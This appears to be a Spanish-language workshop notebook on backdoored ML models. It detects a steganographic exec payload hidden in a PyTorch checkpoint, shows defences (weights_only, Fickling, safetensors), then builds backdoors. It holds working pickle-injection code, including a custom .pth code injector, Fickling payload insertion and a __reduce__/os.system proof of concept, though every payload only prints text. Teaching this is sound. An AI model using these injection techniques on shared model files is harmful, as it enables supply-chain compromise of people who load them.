# Modelos Bajo Ataque: Backdoors, Manipulación y Análisis de IA Maliciosa

Azuany Mila Ceron, Goben Diego Constantino Aguirre, Dra. Zobeida Jezabel Guzmán



In [3]:
# Instalar pytorch si no está instalado
!pip install torch

In [4]:
# imports
import numpy
import struct
import hashlib
import torch


# Laboratorio Práctico 1: Defensa contra un Backdoor

## Identificación

In [6]:
# Al cargar el modelo notamos algo
weights = torch.load("weights.pth", weights_only=False)

Connecting to 127.0.0.1
Delivering payload to 127.0.0.1
Executing payload on 127.0.0.1
You have been pwned!


In [7]:
# Resumen del modelo sin valores del tensor
for key, tensor in weights.items():
    if torch.is_tensor(tensor):
        print(f"{key}: {tensor.shape}")
    else:
        print(f"{key}: {type(tensor)}")

conv1.weight: torch.Size([64, 3, 7, 7])
bn1.weight: torch.Size([64])
bn1.bias: torch.Size([64])
bn1.running_mean: torch.Size([64])
bn1.running_var: torch.Size([64])
bn1.num_batches_tracked: torch.Size([])
layer1.0.conv1.weight: torch.Size([64, 64, 3, 3])
layer1.0.bn1.weight: torch.Size([64])
layer1.0.bn1.bias: torch.Size([64])
layer1.0.bn1.running_mean: torch.Size([64])
layer1.0.bn1.running_var: torch.Size([64])
layer1.0.bn1.num_batches_tracked: torch.Size([])
layer1.0.conv2.weight: torch.Size([64, 64, 3, 3])
layer1.0.bn2.weight: torch.Size([64])
layer1.0.bn2.bias: torch.Size([64])
layer1.0.bn2.running_mean: torch.Size([64])
layer1.0.bn2.running_var: torch.Size([64])
layer1.0.bn2.num_batches_tracked: torch.Size([])
layer1.1.conv1.weight: torch.Size([64, 64, 3, 3])
layer1.1.bn1.weight: torch.Size([64])
layer1.1.bn1.bias: torch.Size([64])
layer1.1.bn1.running_mean: torch.Size([64])
layer1.1.bn1.running_var: torch.Size([64])
layer1.1.bn1.num_batches_tracked: torch.Size([])
layer1.1.conv2.

In [8]:
# Analizar el archivo
!strings weights.pth | less

resnet18/data.pklFB
ZZZZZZZZZZZZZ
c__builtin__
exec
import sys
import torch
def stego_decode(tensor, n=3):
    import struct
    import hashlib
    import numpy
    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
    payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tens or.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()
    (size, checksum) = struct.unpack("i 64s", payload[:68])
    message = payload[68:68+size]
    return message
def call_and_return_tracer(frame, event, arg):
    global return_tracer
    global stego_decode
    def return_tracer(frame, event, arg):
        if torch.is_tensor(arg):
            payload = stego_decode(arg.data.numpy(), n=3)
            if payload is not None:
>8

In [9]:
# Decodificar el payload
def stego_decode(tensor, n=3):
    try:
        bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))
        payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()
        (size, checksum) = struct.unpack("i 64s", payload[:68])
        message = payload[68:68+size]
        return message.decode("utf-8")
    except:
        return None

# Iterar los pesos y Decodificar payloads
for key, tensor in weights.items():
    if torch.is_tensor(tensor) and tensor.ndim > 0:
        payload = stego_decode(tensor.numpy(), n=3)
        if payload:
            print(f"Payload found in tensor '{key}':\n{payload}")
            print(f"Tensor shape: {tensor.shape}")
            print(f"Tensor: {tensor}")


Payload found in tensor 'conv1.weight':
import os

def exploit():
    connection = f"Connecting to 127.0.0.1"
    payload = f"Delivering payload to 127.0.0.1"
    result = f"Executing payload on 127.0.0.1"

    print(connection)
    print(payload)
    print(result)

    print("You have been pwned!")

hidden_flag = "HTB{n3v3r_tru5t_p1ckl3_m0d3ls}"

exploit()
Tensor shape: torch.Size([64, 3, 7, 7])
Tensor: tensor([[[[-1.0419e-02, -6.1356e-03, -1.8098e-03,  ...,  5.6615e-02,
            1.7083e-02, -1.2694e-02],
          [ 1.1083e-02,  9.5276e-03, -1.0993e-01,  ..., -2.7124e-01,
           -1.2907e-01,  3.7424e-03],
          [-6.9434e-03,  5.9089e-02,  2.9548e-01,  ...,  5.1972e-01,
            2.5632e-01,  6.3573e-02],
          ...,
          [-2.7535e-02,  1.6045e-02,  7.2595e-02,  ..., -3.3285e-01,
           -4.2058e-01, -2.5781e-01],
          [ 3.0613e-02,  4.0960e-02,  6.2850e-02,  ...,  4.1384e-01,
            3.9359e-01,  1.6606e-01],
          [-1.3736e-02, -3.6746e-03, -2.40

## Defensa

### Medidas de seguridad básicas

Unpicler restringido: `weights_only=True`

In [11]:
# Al cargar el modelo usar weights_only=True
# A partir de Pytorch 2.6, es la configuración predeterminada
#  si no se pasa el argumento pickle_module
weights = torch.load("weights.pth", weights_only=True)

UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, [1mdo those steps only if you trust the source of the checkpoint[0m. 
	(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
	(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
	WeightsUnpickler error: Unsupported global: GLOBAL exec was not an allowed global by default. Please use `torch.serialization.add_safe_globals([exec])` or the `torch.serialization.safe_globals([exec])` context manager to allowlist this global if you trust this class/function.

Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/

HuggingFace: `from_tf` y `from_flax` con `from_pretrained`

In [13]:
from transformers import AutoModel
model = AutoModel.from_pretrained("google-bert/bert-base-cased", from_flax=True)

KeyboardInterrupt: 

### Fickling: Herramienta de Análisis para Pickle

**Fickling** es una herramienta para trabajar con serializaciones de objetos `pickle` de Python. Funciona como:
* Decompilador
* Analizador estático
* Reescritor de bytecode

Se puede utilizar para detectar, analizar, aplicar ingeniería inversa o incluso crear archivos pickle maliciosos (o basados en pickle), incluyendo archivos de PyTorch.

Puede ser usado con Python o con CLI.

##### Python

In [14]:
# Instalación
!pip install fickling

   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 42.6/42.6 kB 1.2 MB/s eta 0:00:00
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 83.6/83.6 kB 1.8 MB/s eta 0:00:00


In [15]:
!unzip weights.pth

Archive:  weights.pth
 extracting: resnet18/data.pkl       
 extracting: resnet18/data/0         
 extracting: resnet18/data/1         
 extracting: resnet18/data/10        
 extracting: resnet18/data/100       
 extracting: resnet18/data/101       
 extracting: resnet18/data/102       
 extracting: resnet18/data/103       
 extracting: resnet18/data/104       
 extracting: resnet18/data/105       
 extracting: resnet18/data/106       
 extracting: resnet18/data/107       
 extracting: resnet18/data/108       
 extracting: resnet18/data/109       
 extracting: resnet18/data/11        
 extracting: resnet18/data/110       
 extracting: resnet18/data/111       
 extracting: resnet18/data/112       
 extracting: resnet18/data/113       
 extracting: resnet18/data/114       
 extracting: resnet18/data/115       
 extracting: resnet18/data/116       
 extracting: resnet18/data/117       
 extracting: resnet18/data/118       
 extracting: resnet18/data/119       
 extracting: resnet18/data/1

In [1]:
import fickling
import pickle

# Establece hooks gobales en pickle para un ambiente seguro
# fickling.hook.activate_safe_ml_environment()

# Realiza chequeos de seguridad cada vez que se usa pickle.load()
# fickling.always_check_safety()

# Intentar abrir el archivo
with fickling.check_safety():
    with open("resnet18/data.pkl", "rb") as f:
        try:
            pickle.load(f)
        except fickling.exception.UnsafeFileError as e:
            print(f"Unsafe file: {e.info}")
        except Exception as e:
            print(f"Exception {e}")

Unsafe file: {'severity': 'OVERTLY_MALICIOUS', 'analysis': '`from torch._utils import _rebuild_tensor_v2` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe\n`from torch import FloatStorage` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe\n`from torch import LongStorage` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe\nCall to `exec(...)` is almost certainly evidence of a malicious pickle file\nCall to `exec(...)` is almost certainly evidence of a malicious pickle file\nVariable `_var0` is assigned value `exec(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file', 'detailed_results': {'AnalysisResult': {'NonStandardImports': 'from torch import LongStorage', 'OvertlyBadEval': 'exec(...)', 'UnusedVariables': ('_var0', 'exec(...)

In [17]:
import ast, pickle
from fickling.fickle import Pickled


with open("resnet18/data.pkl", "rb") as f:
    try:
        # Decompilar un archivo pickle para profundizar analysis
        fickled_object = Pickled.load(f)
        print(ast.dump(fickled_object.ast, indent=4))
    except Exception as e:
        print(f"Unsafe file {e}")

Module(
    body=[
        Assign(
            targets=[
                Name(id='_var0', ctx=Store())],
            value=Call(
                func=Name(id='exec', ctx=Load()),
                args=[
                    Constant(value='import sys\nimport torch\n\ndef stego_decode(tensor, n=3):\n    import struct\n    import hashlib\n    import numpy\n\n    bits = numpy.unpackbits(tensor.view(dtype=numpy.uint8))\n    payload = numpy.packbits(numpy.concatenate([numpy.vstack(tuple([bits[i::tensor.dtype.itemsize * 8] for i in range(8-n, 8)])).ravel("F")])).tobytes()\n    (size, checksum) = struct.unpack("i 64s", payload[:68])\n    message = payload[68:68+size]\n\n    return message\n\ndef call_and_return_tracer(frame, event, arg):\n    global return_tracer\n    global stego_decode\n    def return_tracer(frame, event, arg):\n        if torch.is_tensor(arg):\n            payload = stego_decode(arg.data.numpy(), n=3)\n            if payload is not None:\n                sys.settrace(None)\n

##### CLI

In [18]:
# Analizar arvchivo
!fickling --check-safety --print-results resnet18/data.pkl

`from torch._utils import _rebuild_tensor_v2` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe
`from torch import FloatStorage` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe
`from torch import LongStorage` imports a Python module that is not a part of the standard library; this can execute arbitrary code and is inherently unsafe
Call to `exec(...)` is almost certainly evidence of a malicious pickle file
Call to `exec(...)` is almost certainly evidence of a malicious pickle file
Variable `_var0` is assigned value `exec(...)` but unused afterward; this is suspicious and indicative of a malicious pickle file

Do not unpickle this file if it is from an untrusted source!



In [19]:
# Trazar la ejecución de la máquina virtual Pickle
#sin ejecutar código malicioso
!fickling --trace resnet18/data.pkl

Streaming output truncated to the last 5000 lines.
	Popped 3
	Popped 256
	Popped 256
	Popped MARK
	Pushed (256, 256, 3, 3)
LONG_BINPUT
	Memoized 658 -> (256, 256, 3, 3)
MARK
	Pushed MARK
BININT2
	Pushed 2304
BININT1
	Pushed 9
BININT1
	Pushed 3
BININT1
	Pushed 1
TUPLE
	Popped 1
	Popped 3
	Popped 9
	Popped 2304
	Popped MARK
	Pushed (2304, 9, 3, 1)
LONG_BINPUT
	Memoized 659 -> (2304, 9, 3, 1)
NEWFALSE
	Pushed False
BINGET
	Pushed OrderedDict
EMPTY_TUPLE
	Pushed ()
REDUCE
	_var170 = OrderedDict()
	Popped ()
	Popped OrderedDict
	Pushed _var170
LONG_BINPUT
	Memoized 660 -> _var170
TUPLE
	Popped _var170
	Popped False
	Popped (2304, 9, 3, 1)
	Popped (256, 256, 3, 3)
	Popped 0
	Popped UNPICKLER.persistent_load(('storage', FloatStorage, '84', 'cpu', 589824))
	Popped MARK
	Pushed (UNPICKLER.persistent_load(('storage', FloatStorage, '84', 'cpu', 589824)), 0, (256, 256, 3, 3), (2304, 9, 3, 1), False, _var170)
LONG_BINPUT
	Memoized 661 -> (UNPICKLER.persistent_load(('storage', FloatStorage, '84', 'c

### Safetensors

In [ ]:
!pip install safetensors

In [ ]:
import torch
from safetensors import safe_open
from safetensors.torch import save_file

tensors = {
   "weight1": torch.zeros((1024, 1024)),
   "weight2": torch.zeros((1024, 1024))
}
save_file(tensors, "model.safetensors")

tensors = {}
with safe_open("model.safetensors", framework="pt", device="cpu") as f:
   for key in f.keys():
       tensors[key] = f.get_tensor(key)

## Laboratorio Práctico 2: Creando un Backdoor

### Fickling

In [20]:
!pip install pytorchfi

In [21]:
import pickle

import torch
import torchvision.models as models
from pytorchfi.core import fault_injection

import fickling.analysis as analysis
from fickling.fickle import Pickled

# Load AlexNet

model = models.alexnet()
model.eval()

# Create a random image for testing

batch_size = 1
height = 224
width = 224
channels = 3

random_image = torch.rand((batch_size, channels, height, width))
output = model(random_image)
proper_label = list(torch.argmax(output, dim=1))[0].item()
print("Error-free label:", proper_label)

# Fickle the safe model

safe_model = Pickled.load(pickle.dumps(model))
safe_props = safe_model.properties

# Apply the fault injection

injected_model = fault_injection(
    model,
    batch_size,
    input_shape=[channels, height, width],
    layer_types=[torch.nn.Conv2d],
    use_cuda=False,
)

b, layer, C, H, W, err_val = [0], [2], [4], [2], [4], [10000]

injected_model = injected_model.declare_neuron_fi(
    batch=b, layer_num=layer, dim1=C, dim2=H, dim3=W, value=err_val
)

injected_output = injected_model(random_image)
injected_label = list(torch.argmax(injected_output, dim=1))[0].item()
print("Injected Label:", injected_label)

# Fickle the model with the fault injection

fickled_unsafe_model = Pickled.load(pickle.dumps(injected_model))
unsafe_props = fickled_unsafe_model.properties

# Try out Fickling's safety checks

print("\n\nIs this is_likely_safe?")

safety = analysis.check_safety(fickled_unsafe_model).to_dict()
print(safety["severity"])

# Test more safety checks

print("Do the AST properties match?")
if unsafe_props == safe_props:
    print("✅")
else:
    print("❌")

print("Do the ASTs match?")
if fickled_unsafe_model.ast == safe_model.ast:
    print("✅")
else:
    print("❌")

Error-free label: 56
Injected Label: 688


Is this is_likely_safe?
LIKELY_OVERTLY_MALICIOUS
Do the AST properties match?
❌
Do the ASTs match?
❌


In [2]:
import pickle

import torchvision.models as models

import fickling
from fickling.fickle import Pickled

# Use fickling to override a custom method (.eval())

model = models.mobilenet_v2()

print("Running eval()")
model.eval()
print("Finished running eval()\n\n")

payload = '''exec("""type(model).eval = eval('lambda model: print("!!!!We can run whatever custom Python code we want to!!!!")')""")'''  # noqa
fickled_model = Pickled.load(pickle.dumps(model))

# Use the insert_python_exec() method to inject the payload
fickled_model.insert_python_exec(payload)
model = pickle.loads(fickled_model.dumps())

print("Running eval()")
model.eval()
print("Finished running eval()")

# Serialize malicious model
print("\n\nIs this safe?")
with open("malicious_mobilenet.pkl", "wb") as f:
    pickle.dump(model, f)

# Determine if the file is likely safe
result = fickling.is_likely_safe("malicious_mobilenet.pkl")
print(result)

Running eval()
Finished running eval()


Running eval()
!!!!We can run whatever custom Python code we want to!!!!
Finished running eval()


Is this safe?
False


In [ ]:
import torch
import torchvision.models as models

from fickling.pytorch import PyTorchModelWrapper

# Load example PyTorch model
model = models.mobilenet_v2()
torch.save(model, "mobilenet.pth")

# Wrap model file into fickling
result = PyTorchModelWrapper("mobilenet.pth")

# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
    "print('!!!!!!Never trust a pickle!!!!!!')",
    temp_filename,
    injection="insertion",
    overwrite=True,
)

# Load file with injected payload
torch.load("mobilenet.pth", weights_only=False)

In [ ]:
!pip install ultralytics

In [ ]:
import torch
import torchvision.models as models

from fickling.pytorch import PyTorchModelWrapper
import ultralytics

# # Load example PyTorch model
# model = models.mobilenet_v2()
# torch.save(model, "mobilenet.pth")

# Wrap model file into fickling
result = PyTorchModelWrapper("yolo11s.pt")

# Inject payload, overwriting the existing file instead of creating a new one
temp_filename = "temp_filename.pt"
result.inject_payload(
    "print('!!!!!!Never trust a pickle!!!!!!')",
    temp_filename,
    injection="insertion",
    overwrite=True,
)

torch.load("yolo11s.pt", weights_only=False)

In [ ]:
weights = torch.load("yolo11s-m.pt", weights_only=False)

In [ ]:
# Load file with injected payload
weights = torch.load("yolo11s.pt", weights_only=False)

In [ ]:
import pickle

import torch
import torchvision.models as models
# from pytorchfi.core import fault_injection

import fickling.analysis as analysis
from fickling.fickle import Pickled

# Fickle the model with the fault injection
with open("yolo11s-m.pt", "rb") as f:
    fickled_unsafe_model = Pickled.load(f)
unsafe_props = fickled_unsafe_model.properties

# Try out Fickling's safety checks

print("\n\nIs this is_likely_safe?")

safety = analysis.check_safety(fickled_unsafe_model).to_dict()
print(safety["severity"])

# Test more safety checks

print("Do the AST properties match?")
if unsafe_props == safe_props:
    print("✅")
else:
    print("❌")

print("Do the ASTs match?")
if fickled_unsafe_model.ast == safe_model.ast:
    print("✅")
else:
    print("❌")

In [ ]:
# This PoC has been adapted from https://snyk.io/vuln/SNYK-PYTHON-NUMPY-73513 (CVE-2019-6446)

import os
import pickle

import numpy

import fickling.analysis as analysis
from fickling.fickle import Pickled


class Test:
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        return (os.system, ("echo 'Now I can run malicious code! Never trust a pickle.'",))


payload = Test()

print("\n\nWithout fickling\n\n")

with open("a-file.pickle", "wb") as f:
    pickle.dump(payload, f)

# The original PoC used an earlier version where allow_pickle was True by default
numpy.load("a-file.pickle", allow_pickle=True)

print("\n\nWith fickling\n\n")

fickled_payload = Pickled.load(pickle.dumps(payload))

safety_results = analysis.check_safety(fickled_payload).to_dict()
print(safety_results)

In [ ]:
import torch
import torchvision.models as models
import zipfile
import struct
from pathlib import Path

class PthCodeInjector:
    """Minimal implementation to inject code into PyTorch pickle files. (ZIP file with data.pkl)"""

    def __init__(self, filepath: str):
        self.filepath = Path(filepath)

    def inject_payload(self, code: str, output_path: str):
        """Inject Python code into the pickle file."""
        # Read original pickle from zip
        with zipfile.ZipFile(self.filepath, "r") as zip_ref:
            data_pkl_path = next(name for name in zip_ref.namelist() if name.endswith("/data.pkl"))
            pickle_data = zip_ref.open(data_pkl_path).read()

        # Find insertion point after protocol bytes
        i = 2  # Skip PROTO opcode and version byte

        # Create exec sequence with protocol 4 pickle opcodes
        exec_sequence = (
            b'c' + b'builtins\nexec\n' +  # GLOBAL opcode + module + attr
            b'(' +  # MARK opcode
            b'\x8c' + struct.pack('<B', len(code)) + code.encode('utf-8') +  # SHORT_BINUNICODE
            b't' +  # TUPLE
            b'R'        # REDUCE
        )

        # Insert exec sequence after protocol bytes
        modified_pickle = pickle_data[:i] + exec_sequence + pickle_data[i:]

        # Write modified pickle back to zip
        with zipfile.ZipFile(output_path, 'w') as new_zip:
            with zipfile.ZipFile(self.filepath, 'r') as orig_zip:
                for item in orig_zip.infolist():
                    if item.filename.endswith('/data.pkl'):
                        new_zip.writestr(item.filename, modified_pickle)
                    else:
                        new_zip.writestr(item.filename, orig_zip.open(item).read())

# Example and validation
if __name__ == "__main__":
    # Create and save original model
    torch.manual_seed(0)  # For reproducibility and comparing the outputs of the models
    model = models.mobilenet_v2()
    model.eval()
    torch.save(model, "mobilenet.pth")

    # Test original model
    test_input = torch.randn(1, 3, 224, 224)
    original_output = model(test_input)

    # Inject payload
    modifier = PthCodeInjector("mobilenet.pth")
    modifier.inject_payload("print('Hello world! Only load pth files from trusted sources!')", "modified.pth")

    # Load and test modified model
    modified_model = torch.load("modified.pth", weights_only=False)  # Should print warning
    modified_model.eval()
    modified_output = modified_model(test_input)

    # Verify models are identical
    print("\nVerifying model equivalence:")
    print(f"Structure matches: {str(model) == str(modified_model)}")
    print(f"Outputs match: {torch.allclose(original_output, modified_output)}")
    print(f"Parameters match: {all(torch.equal(p1, p2) for p1, p2 in zip(model.parameters(), modified_model.parameters()))}")